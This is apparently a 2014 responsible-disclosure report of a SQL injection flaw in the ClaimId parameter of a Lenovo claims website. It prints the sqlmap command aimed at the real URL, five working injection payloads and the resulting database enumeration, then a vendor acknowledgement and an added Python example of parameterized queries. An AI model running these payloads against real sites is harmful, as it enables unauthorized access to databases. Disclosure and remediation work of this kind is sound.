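2014-01-03: Details reported to the vendor; awaiting vendor handling
2014-01-03: Vendor confirmed; details disclosed to the vendor only
2014-01-13: Details disclosed to core white hats and experts in related fields
2014-01-23: Details disclosed to regular white hats
2014-02-02: Details disclosed to intern white hats
2014-02-17: Details disclosed to the public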
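Lenovo: SQL injection in an important service platform system leads to information disclosure (multiple databases)
Site: http://claims.lenovo.com (Lenovo service platform system). Because the site has no robots.txt, it was crawled by search engines.
The ClaimId parameter is not filtered, which leads to SQL injection. Running sqlmap against it: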
Sqlmap -u "http://claims.lenovo.com/Claim/PrintPartInformation.aspx?ClaimId=9990540964&PartNumber=45N7321&Notes" --dbs --current-user --current-db

Place: GET
Parameter: ClaimId
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ClaimId=9990540964' AND 2958=2958 AND 'Pjcy'='Pjcy&PartNumber=45N7321&Notes

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: ClaimId=9990540964' AND 9468=CONVERT(INT,(CHAR(58)+CHAR(115)+CHAR(101)+CHAR(118)+CHAR(58)+(SELECT (CASE WHEN (9468=9468) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(118)+CHAR(102)+CHAR(98)+CHAR(58))) AND 'whgb'='whgb&PartNumber=45N7321&Notes

    Type: UNION query
    Title: Generic UNION query (NULL) - 14 columns
    Payload: ClaimId=-4899' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, CHAR(58)+CHAR(115)+CHAR(101)+CHAR(118)+CHAR(58)+CHAR(73)+CHAR(99)+CHAR(122)+CHAR(66)+CHAR(115)+CHAR(80)+CHAR(88)+CHAR(109)+CHAR(111)+CHAR(89)+CHAR(58)+CHAR(118)+CHAR(102)+CHAR(98)+CHAR(58), NULL, NULL, NULL, NULL, NULL, NULL-- &PartNumber=45N7321&Notes

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: ClaimId=9990540964'; WAITFOR DELAY '0:0:5';--&PartNumber=45N7321&Notes

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: ClaimId=9990540964' WAITFOR DELAY '0:0:5'--&PartNumber=45N7321&Notes
---
[17:34:45] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2005
[17:34:45] [INFO] fetching current user
current user: 'eclaim'
[17:34:45] [INFO] fetching current database
current database: 'Eclaim_p'
[17:34:45] [INFO] fetching database names
[17:34:45] [INFO] the SQL query used returns 6 entries
[17:34:45] [INFO] resumed: "Eclaim"
[17:34:45] [INFO] resumed: "Eclaim_p"
[17:34:45] [INFO] resumed: "master"
[17:34:45] [INFO] resumed: "model"
[17:34:45] [INFO] resumed: "msdb"
[17:34:45] [INFO] resumed: "tempdb"
available databases [6]:
[*] Eclaim
[*] Eclaim_p
[*] master
[*] model
[*] msdb
[*] tempdb
Current database:
Database: Eclaim_p [191 tables]
Another database:
Database: Eclaim [293 tables]
The data volume is also large:
Database: Eclaim
over
Already demonstrated above.
1. Filter the parameter
2. High rank, please
3. SSD, come into my bowl
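The fix requested above ("filter the parameter"), as an added example that is not code from the report or from the affected application: a query built by string concatenation next to the same lookup with bound parameters and allow-list validation of ClaimId. SQLite in memory stands in for SQL Server, the table, column and function names and the assumed value formats are hypothetical, and the test value is the boolean-based payload from the sqlmap output on this page.

```python
import re
import sqlite3

# Boolean-based test value for ClaimId, copied from the sqlmap output on this page.
PAGE_PAYLOAD = "9990540964' AND 2958=2958 AND 'Pjcy'='Pjcy"

def make_db():
    """Constructed sample data; the schema is hypothetical."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE claim_parts (claim_id TEXT, part_number TEXT, notes TEXT)")
    db.executemany("INSERT INTO claim_parts VALUES (?, ?, ?)", [
        ("9990540964", "45N7321", "constructed row A"),
        ("9990540965", "45N7321", "constructed row B"),
    ])
    return db

def lookup_concatenated(db, claim_id, part_number):
    """Before: request values are pasted into the SQL text, so a quote in
    ClaimId ends the string literal and the rest is parsed as SQL."""
    sql = ("SELECT notes FROM claim_parts WHERE claim_id = '" + claim_id +
           "' AND part_number = '" + part_number + "'")
    return [row[0] for row in db.execute(sql)]

def lookup_parameterized(db, claim_id, part_number):
    """After: values are bound, so they are only ever compared as data."""
    sql = "SELECT notes FROM claim_parts WHERE claim_id = ? AND part_number = ?"
    return [row[0] for row in db.execute(sql, (claim_id, part_number))]

CLAIM_ID_RE = re.compile(r"[0-9]{1,20}")           # assumed format: digits only
PART_NUMBER_RE = re.compile(r"[0-9A-Za-z]{1,20}")  # assumed format: alphanumeric

def handle_request(db, claim_id, part_number):
    """Allow-list validation in front of the bound query (defence in depth)."""
    if not CLAIM_ID_RE.fullmatch(claim_id) or not PART_NUMBER_RE.fullmatch(part_number):
        raise ValueError("malformed ClaimId or PartNumber")
    return lookup_parameterized(db, claim_id, part_number)

if __name__ == "__main__":
    db = make_db()
    print(lookup_concatenated(db, PAGE_PAYLOAD, "45N7321"))   # payload parsed as SQL
    print(lookup_parameterized(db, PAGE_PAYLOAD, "45N7321"))  # payload treated as data
    try:
        handle_request(db, PAGE_PAYLOAD, "45N7321")
    except ValueError as exc:
        print("rejected:", exc)
```

Binding is what removes the injection; the allow-list only rejects malformed requests earlier. Since the sqlmap output shows the application login enumerating all six databases, restricting that login to the objects this page needs would further limit exposure.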
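Severity: High
Vulnerability Rank: 15
Confirmed at: 2014-01-03 17:12
Thank you for your contribution to Lenovo security! We will immediately assess and fix the related vulnerability.
None yet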